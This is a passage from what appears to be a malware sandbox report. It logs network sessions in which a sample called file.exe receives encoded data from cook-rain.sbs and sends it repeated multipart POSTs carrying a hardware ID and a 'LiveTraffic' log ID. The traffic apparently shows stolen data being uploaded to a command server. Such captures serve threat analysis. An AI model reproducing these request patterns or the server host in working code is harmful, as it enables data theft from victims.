74 73 51 56 7a 7a 2f 77 61 65 77 59 36 68 4e 45 39 6e 42 65 6e 41 66 6c 6a 31 Data Ascii: RTnKI+coM1n2HJAU0tFQvj5E9j4jvA6UT9CvcAXG/l5GuIjgN/mhnLAIB4ebVJU+vsPmdDE4XJLdk64hUhfsTJZ5jDPhK6sbcs+EgRoAE2x7EWdzo63NEx+QbCEQVX1cB/vJYDa5I1nyjoQEmVLXf/wCJ7Ewu5xCDEFtpgPA7FSHuI6zentg27HJFgMJlkS+PlFwoLA6ntafle0jl1X9HoU4iaP2emAbsY1GxtsQVzz/waewY6hNE9nBenAflj1
2024-11-19 20:02:20 UTC	1369	IN	Data Raw: 2b 46 30 75 6d 4a 62 4d 6b 2f 48 68 4e 76 52 46 66 74 38 41 79 57 7a 6f 36 68 4e 45 39 6e 42 65 6e 41 59 46 7a 6e 66 7a 62 69 4f 59 61 63 38 63 4e 35 67 44 55 55 55 7a 41 41 56 66 72 39 44 70 7a 4b 7a 76 31 78 52 6e 52 45 75 34 5a 4f 56 76 31 36 47 65 41 6f 69 64 44 75 69 6d 66 53 49 42 30 56 65 6b 6f 53 73 62 55 43 67 6f 4b 57 72 30 4a 59 61 46 53 6e 77 6e 70 59 2f 33 49 65 39 32 69 51 6b 76 66 4e 5a 38 78 79 51 46 4e 6a 51 46 37 34 2f 51 4f 65 79 73 48 67 66 56 70 2b 53 62 2b 53 53 46 76 34 63 68 62 74 49 59 4c 62 34 34 5a 71 7a 54 59 66 45 69 67 4f 45 76 6a 74 52 63 4b 43 2b 50 39 35 52 46 46 4f 76 59 6b 50 52 4c 39 6c 57 65 59 6b 7a 34 53 75 69 57 7a 49 4f 42 63 61 59 6b 70 64 39 76 55 4e 6b 38 76 4e 37 33 68 4f 66 6b 6d 39 6a 55 70 59 39 48 45 63 34 Data Ascii: +F0umJbMk/HhNvRFft8AyWzo6hNE9nBenAYFznfzbiOYac8cN5gDUUUzAAVfr9DpzKzv1xRnREu4ZOVv16GeAoidDuimfSIB0VekoSsbUCgoKWr0JYaFSnwnpY/3Ie92iQkvfNZ8xyQFNjQF74/QOeysHgfVp+Sb+SSFv4chbtIYLb44ZqzTYfEigOEvjtRcKC+P95RFFOvYkPRL9lWeYkz4SuiWzIOBcaYkpd9vUNk8vN73hOfkm9jUpY9HEc4
2024-11-19 20:02:20 UTC	1369	IN	Data Raw: 75 69 6d 79 41 61 6c 67 66 61 30 78 61 38 50 4d 4d 6c 73 6a 48 35 48 68 44 65 30 6d 34 68 55 6c 61 39 48 6b 59 35 53 53 46 32 75 32 4f 62 38 38 39 45 46 4d 6d 41 46 58 6e 74 56 33 61 35 39 6e 6b 65 6b 34 2f 57 76 2b 5a 44 31 7a 39 50 45 47 68 4a 49 62 61 36 49 68 73 77 54 51 51 46 6d 42 45 55 2f 6e 7a 42 70 58 47 79 2b 35 37 54 48 4e 4c 75 34 46 4f 56 2f 70 7a 45 75 52 6f 77 5a 7a 70 6c 53 43 59 63 69 6b 51 66 6c 64 43 38 37 55 61 31 4e 75 4f 36 48 67 49 4a 77 57 77 6b 6b 56 52 2f 33 6b 57 35 43 75 41 32 2b 4f 4c 62 4d 6f 37 45 42 56 6e 53 55 44 38 2b 51 75 64 7a 4d 4c 68 65 55 4a 38 53 50 48 4f 44 31 7a 70 50 45 47 68 42 49 6a 52 77 49 5a 73 78 33 49 48 58 58 45 41 56 66 4f 31 58 64 72 4f 78 4f 4e 39 53 48 5a 41 75 59 74 47 58 76 42 33 48 4f 49 75 67 74 Data Ascii: uimyAalgfa0xa8PMMlsjH5HhDe0m4hUla9HkY5SSF2u2Ob889EFMmAFXntV3a59nkek4/Wv+ZD1z9PEGhJIba6IhswTQQFmBEU/nzBpXGy+57THNLu4FOV/pzEuRowZzplSCYcikQfldC87Ua1NuO6HgIJwWwkkVR/3kW5CuA2+OLbMo7EBVnSUD8+QudzMLheUJ8SPHOD1zpPEGhBIjRwIZsx3IHXXEAVfO1XdrOxON9SHZAuYtGXvB3HOIugt
2024-11-19 20:02:20 UTC	1369	IN	Data Raw: 7a 48 4a 41 55 32 35 50 57 2f 7a 36 42 4a 50 4f 77 2b 70 39 54 58 35 44 74 59 70 46 57 2f 64 36 47 4f 51 69 6a 4e 33 6b 68 47 66 49 4e 52 73 42 4b 41 34 53 2b 4f 31 46 77 6f 4c 6e 36 47 5a 47 62 77 57 75 7a 6c 59 62 39 6e 42 5a 75 57 69 4c 31 75 47 4a 5a 38 77 30 48 52 56 6c 51 56 33 2b 39 51 71 65 79 63 66 70 64 55 56 36 53 4c 57 53 52 56 44 2b 63 42 44 74 4a 63 2b 53 72 6f 70 34 67 47 70 59 49 6d 56 4f 58 50 6a 6a 52 59 57 4d 31 36 39 7a 52 44 38 64 38 59 46 44 56 50 4a 7a 47 75 49 70 68 63 37 38 67 57 6e 49 4e 78 51 59 5a 6b 5a 41 2b 66 6f 4d 6d 63 48 48 36 48 78 45 64 55 61 32 77 41 45 62 39 6d 52 5a 75 57 69 73 79 2f 36 41 49 4e 39 38 41 56 4e 76 54 42 4b 6e 74 51 32 58 79 73 54 72 63 30 56 34 51 37 69 53 52 6c 37 2f 66 42 33 71 4a 34 6e 59 37 59 31 Data Ascii: zHJAU25PW/z6BJPOw+p9TX5DtYpFW/d6GOQijN3khGfINRsBKA4S+O1FwoLn6GZGbwWuzlYb9nBZuWiL1uGJZ8w0HRVlQV3+9QqeycfpdUV6SLWSRVD+cBDtJc+Srop4gGpYImVOXPjjRYWM169zRD8d8YFDVPJzGuIphc78gWnINxQYZkZA+foMmcHH6HxEdUa2wAEb9mRZuWisy/6AIN98AVNvTBKntQ2XysTrc0V4Q7iSRl7/fB3qJ4nY7Y1
2024-11-19 20:02:20 UTC	1369	IN	Data Raw: 52 77 6f 44 68 4c 34 37 55 58 43 67 75 2f 30 64 30 52 79 42 61 37 4f 56 68 76 32 63 46 6d 35 61 49 50 53 36 34 31 71 78 6a 59 64 46 57 4a 46 55 76 54 32 43 70 37 45 79 75 42 30 51 33 5a 45 74 34 56 46 55 50 64 78 47 75 63 75 7a 35 4b 75 69 6e 69 41 61 6c 67 7a 63 30 31 65 2b 4c 55 61 31 4e 75 4f 36 48 67 49 4a 77 57 36 6a 45 74 63 38 58 45 61 36 53 32 4c 31 75 75 4e 61 4e 49 36 47 42 52 36 55 6c 4c 32 38 41 6d 5a 77 73 72 70 66 55 35 38 51 66 48 4f 44 31 7a 70 50 45 47 68 42 59 50 62 78 34 70 37 67 43 31 57 43 69 68 48 58 72 2b 74 52 5a 76 4a 78 4f 42 35 53 33 6c 47 75 6f 56 46 57 76 5a 30 46 50 4d 72 67 4e 50 71 6a 57 2f 47 4e 42 6b 63 62 6b 64 62 2f 76 30 43 32 6f 79 4f 36 47 77 49 4a 77 57 66 68 30 78 66 73 57 4e 58 2b 47 69 49 30 4b 37 56 49 4d 41 34 Data Ascii: RwoDhL47UXCgu/0d0RyBa7OVhv2cFm5aIPS641qxjYdFWJFUvT2Cp7EyuB0Q3ZEt4VFUPdxGucuz5KuiniAalgzc01e+LUa1NuO6HgIJwW6jEtc8XEa6S2L1uuNaNI6GBR6UlL28AmZwsrpfU58QfHOD1zpPEGhBYPbx4p7gC1WCihHXr+tRZvJxOB5S3lGuoVFWvZ0FPMrgNPqjW/GNBkcbkdb/v0C2oyO6GwIJwWfh0xfsWNX+GiI0K7VIMA4
2024-11-19 20:02:20 UTC	1369	IN	Data Raw: 63 53 77 4c 74 46 67 6f 4b 57 72 30 46 4c 63 55 75 32 6c 6c 34 57 31 6d 6f 54 35 6a 69 49 79 2b 48 4e 4c 6f 41 30 57 45 73 37 44 68 4c 37 35 45 58 43 6b 70 79 30 49 52 73 6f 46 65 4f 66 41 55 4b 78 61 6c 6d 35 65 73 47 63 2f 4d 30 34 67 48 55 62 41 58 70 47 55 65 6e 32 51 71 54 38 36 66 56 35 54 6d 68 55 6a 37 35 49 51 66 78 36 44 76 42 6b 6d 74 2f 67 67 32 66 57 63 6c 5a 54 5a 77 41 4b 78 72 56 4e 32 76 32 41 72 32 77 49 4a 77 57 45 67 30 46 56 39 6d 6f 49 72 41 2b 56 30 65 69 61 63 59 42 38 57 42 55 6f 47 41 4b 78 74 51 47 4c 67 70 61 2f 4a 68 4d 71 46 75 62 51 48 55 53 2f 5a 56 6e 33 61 4e 65 4f 6f 4d 31 79 67 47 70 59 56 47 74 53 51 50 6e 32 45 35 6d 46 38 4e 46 61 54 33 6c 41 74 70 41 4e 64 66 70 6f 48 71 46 6d 7a 39 4f 75 31 56 6d 41 65 6c 67 73 4a Data Ascii: cSwLtFgoKWr0FLcUu2ll4W1moT5jiIy+HNLoA0WEs7DhL75EXCkpy0IRsoFeOfAUKxalm5esGc/M04gHUbAXpGUen2QqT86fV5TmhUj75IQfx6DvBkmt/gg2fWclZTZwAKxrVN2v2Ar2wIJwWEg0FV9moIrA+V0eiacYB8WBUoGAKxtQGLgpa/JhMqFubQHUS/ZVn3aNeOoM1ygGpYVGtSQPn2E5mF8NFaT3lAtpANdfpoHqFmz9Ou1VmAelgsJ
2024-11-19 20:02:20 UTC	1369	IN	Data Raw: 37 52 5a 37 54 6a 72 63 6b 47 69 51 51 34 74 63 66 43 65 34 79 41 4b 45 2b 7a 34 53 38 77 79 44 53 63 6b 42 54 4c 30 4e 41 37 66 4d 47 6a 4d 47 4a 30 55 70 76 63 55 4b 77 6c 6c 39 4d 2f 6a 4d 33 31 77 6d 78 34 76 75 4f 62 73 34 31 44 67 49 6f 44 68 4c 77 74 56 32 6a 67 6f 61 76 53 77 59 2f 58 66 48 59 44 32 37 79 63 68 66 6d 50 70 36 52 79 59 4e 6e 77 53 51 49 42 47 63 50 66 4d 6e 55 52 64 53 43 79 4b 38 73 47 6a 45 46 74 5a 45 50 41 36 45 75 51 72 52 37 32 49 79 38 6b 69 37 5a 63 67 35 54 4d 42 49 63 76 2b 64 46 77 6f 4b 4a 37 47 5a 61 65 55 61 6e 67 77 68 6c 7a 31 73 58 35 69 6d 5a 7a 4f 4f 42 51 63 4d 6a 45 69 31 57 56 56 48 78 2b 77 4b 4d 30 34 36 68 4e 45 63 2f 48 59 6a 41 42 78 76 4f 4d 6c 6e 35 61 4e 65 63 32 34 35 75 7a 6a 55 4f 41 69 56 6e 58 50 Data Ascii: 7RZ7TjrckGiQQ4tcfCe4yAKE+z4S8wyDSckBTL0NA7fMGjMGJ0UpvcUKwll9M/jM31wmx4vuObs41DgIoDhLwtV2jgoavSwY/XfHYD27ychfmPp6RyYNnwSQIBGcPfMnURdSCyK8sGjEFtZEPA6EuQrR72Iy8ki7Zcg5TMBIcv+dFwoKJ7GZaeUangwhlz1sX5imZzOOBQcMjEi1WVVHx+wKM046hNEc/HYjABxvOMln5aNec245uzjUOAiVnXP
2024-11-19 20:02:20 UTC	1369	IN	Data Raw: 35 4d 33 35 64 77 67 78 42 61 6e 41 46 78 76 63 62 68 37 78 4b 38 33 77 36 59 42 73 67 43 31 57 43 69 68 57 45 71 65 6d 53 39 72 51 6a 72 63 30 44 33 78 58 6f 34 5a 4d 54 66 49 37 4a 39 38 46 6e 64 76 2b 6a 69 4c 78 50 78 77 46 66 55 4e 43 2b 4d 73 37 74 39 44 4a 2f 33 63 4b 57 6e 2f 7a 73 56 6c 59 38 58 49 65 6f 57 62 50 78 4b 37 56 49 4f 30 67 48 77 4e 72 41 6e 66 46 74 7a 53 4d 77 63 37 68 63 77 68 67 43 36 6a 41 57 52 75 70 4c 31 65 68 4f 73 2b 45 72 73 70 75 7a 54 4d 62 48 57 74 53 51 50 6e 32 45 35 6d 46 38 4e 46 62 51 33 35 56 76 4a 46 43 58 2b 64 43 4a 38 59 75 69 74 76 51 73 31 66 52 4e 51 68 52 54 6b 4e 45 2f 4c 56 4c 32 74 71 4f 74 7a 52 76 65 55 43 32 77 41 45 62 39 54 78 42 6f 51 65 45 33 66 36 41 63 63 30 32 44 6c 46 50 52 6c 66 34 74 55 76 Data Ascii: 5M35dwgxBanAFxvcbh7xK83w6YBsgC1WCihWEqemS9rQjrc0D3xXo4ZMTfI7J98Fndv+jiLxPxwFfUNC+Ms7t9DJ/3cKWn/zsVlY8XIeoWbPxK7VIO0gHwNrAnfFtzSMwc7hcwhgC6jAWRupL1ehOs+ErspuzTMbHWtSQPn2E5mF8NFbQ35VvJFCX+dCJ8YuitvQs1fRNQhRTkNE/LVL2tqOtzRveUC2wAEb9TxBoQeE3f6Acc02DlFPRlf4tUv

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49735	188.114.97.3	443	7616	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-19 20:02:21 UTC	274	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=CTPDKFGRVFAZ4 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12820 Host: cook-rain.sbs
2024-11-19 20:02:21 UTC	12820	OUT	Data Raw: 2d 2d 43 54 50 44 4b 46 47 52 56 46 41 5a 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 34 34 39 36 37 34 30 33 31 43 43 37 45 44 34 36 33 43 46 43 46 37 45 36 43 34 35 46 38 33 38 0d 0a 2d 2d 43 54 50 44 4b 46 47 52 56 46 41 5a 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 43 54 50 44 4b 46 47 52 56 46 41 5a 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 43 54 50 44 4b Data Ascii: --CTPDKFGRVFAZ4Content-Disposition: form-data; name="hwid"A449674031CC7ED463CFCF7E6C45F838--CTPDKFGRVFAZ4Content-Disposition: form-data; name="pid"2--CTPDKFGRVFAZ4Content-Disposition: form-data; name="lid"LOGS11--LiveTraffic--CTPDK
2024-11-19 20:02:23 UTC	986	IN	HTTP/1.1 200 OK Date: Tue, 19 Nov 2024 20:02:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=5eoij7e2968tva9ba3j3djjjqh; expires=Sat, 15-Mar-2025 13:49:01 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RhAQsthE4rtmVnErjEbtR4vh8ql0zbU3%2BUHum6rgyYhNuyLfG3BesInfpMIyAPj1OW7hwL9Wr%2BL8IiE1c8rzzYZPGy2qv7IWmPfy8UU%2BZPfZ59VkP%2BFzMkvH300Wl7Pw"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e52cc25fbeb7c94-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1813&sent=8&recv=17&lost=0&retrans=0&sent_bytes=2830&recv_bytes=13752&delivery_rate=1532808&cwnd=234&unsent_bytes=0&cid=5512dc6a345c3e6d&ts=1505&x=0"
2024-11-19 20:02:23 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a Data Ascii: eok 8.46.123.75
2024-11-19 20:02:23 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49750	188.114.97.3	443	7616	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-19 20:02:24 UTC	279	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=7F86KJFW4RGNPFATUK User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15082 Host: cook-rain.sbs
2024-11-19 20:02:24 UTC	15082	OUT	Data Raw: 2d 2d 37 46 38 36 4b 4a 46 57 34 52 47 4e 50 46 41 54 55 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 34 34 39 36 37 34 30 33 31 43 43 37 45 44 34 36 33 43 46 43 46 37 45 36 43 34 35 46 38 33 38 0d 0a 2d 2d 37 46 38 36 4b 4a 46 57 34 52 47 4e 50 46 41 54 55 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 37 46 38 36 4b 4a 46 57 34 52 47 4e 50 46 41 54 55 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 Data Ascii: --7F86KJFW4RGNPFATUKContent-Disposition: form-data; name="hwid"A449674031CC7ED463CFCF7E6C45F838--7F86KJFW4RGNPFATUKContent-Disposition: form-data; name="pid"2--7F86KJFW4RGNPFATUKContent-Disposition: form-data; name="lid"LOGS11--LiveT
2024-11-19 20:02:24 UTC	983	IN	HTTP/1.1 200 OK Date: Tue, 19 Nov 2024 20:02:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=g84uol1kel82nbjfomsjjv99ef; expires=Sat, 15-Mar-2025 13:49:03 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1%2FSKI1BX0wLAYems8zHVQQH1l10Dbnw02S8ZgbnBgzUnixKPfhLL4%2FKiO4aWBp4o42sWq1PsAPPzBhQLSByuWWmosEOwnPasVId5eUCbfpw3Hi21MiTbX9I5jGcadwZ%2F"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e52cc35baca4363-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1622&sent=9&recv=20&lost=0&retrans=0&sent_bytes=2829&recv_bytes=16019&delivery_rate=1726788&cwnd=235&unsent_bytes=0&cid=306998ccc69ae4d0&ts=695&x=0"
2024-11-19 20:02:24 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a Data Ascii: eok 8.46.123.75
2024-11-19 20:02:24 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	49761	188.114.97.3	443	7616	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-19 20:02:25 UTC	272	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=XHOZEPLKFR1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20365 Host: cook-rain.sbs
2024-11-19 20:02:25 UTC	15331	OUT	Data Raw: 2d 2d 58 48 4f 5a 45 50 4c 4b 46 52 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 34 34 39 36 37 34 30 33 31 43 43 37 45 44 34 36 33 43 46 43 46 37 45 36 43 34 35 46 38 33 38 0d 0a 2d 2d 58 48 4f 5a 45 50 4c 4b 46 52 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 58 48 4f 5a 45 50 4c 4b 46 52 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 58 48 4f 5a 45 50 4c 4b 46 52 31 Data Ascii: --XHOZEPLKFR1Content-Disposition: form-data; name="hwid"A449674031CC7ED463CFCF7E6C45F838--XHOZEPLKFR1Content-Disposition: form-data; name="pid"3--XHOZEPLKFR1Content-Disposition: form-data; name="lid"LOGS11--LiveTraffic--XHOZEPLKFR1
2024-11-19 20:02:25 UTC	5034	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 36 d7 17 05 4b db 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e6 fa a3 60 69 db 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 db 5c 5f 14 2c 6d fb 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 9b eb 8f 82 a5 6d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 73 7d 51 b0 b4 ed a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 6d ae 2f f8 f5 58 32 78 29 1e bc 14 fc db e0 ab e6 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 6K~`iO\_,mi`m?ls}Qm/X2x)
2024-11-19 20:02:27 UTC	987	IN	HTTP/1.1 200 OK Date: Tue, 19 Nov 2024 20:02:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=btroan3dur19fibia3u0r4ltrp; expires=Sat, 15-Mar-2025 13:49:05 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QVspw698ZDifz34%2F2ucgPpCfEYq7F1G90Xhkr5XpSmKr1pCcqXUiKnll80%2BiWzJXesSmvkV%2BU%2F9Nbi2buRUNv9oh2ahmZwy7vft1npyBKudtZFunMURZ7cZmn0RGawrk"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e52cc3e594e188d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1865&sent=12&recv=27&lost=0&retrans=0&sent_bytes=2830&recv_bytes=21317&delivery_rate=1643218&cwnd=156&unsent_bytes=0&cid=4792f2c199bacffd&ts=1510&x=0"
2024-11-19 20:02:27 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a Data Ascii: eok 8.46.123.75
2024-11-19 20:02:27 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.7	49778	188.114.97.3	443	7616	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-19 20:02:28 UTC	269	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=H5ZRJNGOB User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1188 Host: cook-rain.sbs
2024-11-19 20:02:28 UTC	1188	OUT	Data Raw: 2d 2d 48 35 5a 52 4a 4e 47 4f 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 34 34 39 36 37 34 30 33 31 43 43 37 45 44 34 36 33 43 46 43 46 37 45 36 43 34 35 46 38 33 38 0d 0a 2d 2d 48 35 5a 52 4a 4e 47 4f 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 48 35 5a 52 4a 4e 47 4f 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 48 35 5a 52 4a 4e 47 4f 42 0d 0a 43 6f 6e 74 65 6e Data Ascii: --H5ZRJNGOBContent-Disposition: form-data; name="hwid"A449674031CC7ED463CFCF7E6C45F838--H5ZRJNGOBContent-Disposition: form-data; name="pid"1--H5ZRJNGOBContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--H5ZRJNGOBConten
2024-11-19 20:02:30 UTC	980	IN	HTTP/1.1 200 OK Date: Tue, 19 Nov 2024 20:02:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ra8ueasekovlnlt3mvsffld7ai; expires=Sat, 15-Mar-2025 13:49:07 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aKoG747F7X9p1Q7PdH3K0yaUMjVv4yohfTHppbX%2BxSAOoZoagmZiphj8Ke%2BiJf2hovrPIs9GFyiRXCgLETYSIQ0OeGv4oqcWKhGM88mmMp8S3jekNX5DTKmZzmmQfsm0"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e52cc4ea84841ad-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1563&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2829&recv_bytes=2093&delivery_rate=1795817&cwnd=181&unsent_bytes=0&cid=d078320550ea2a77&ts=2280&x=0"
2024-11-19 20:02:30 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a Data Ascii: eok 8.46.123.75
2024-11-19 20:02:30 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.7	49802	188.114.97.3	443	7616	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-19 20:02:31 UTC	270	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=74RWR44E User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 583405 Host: cook-rain.sbs
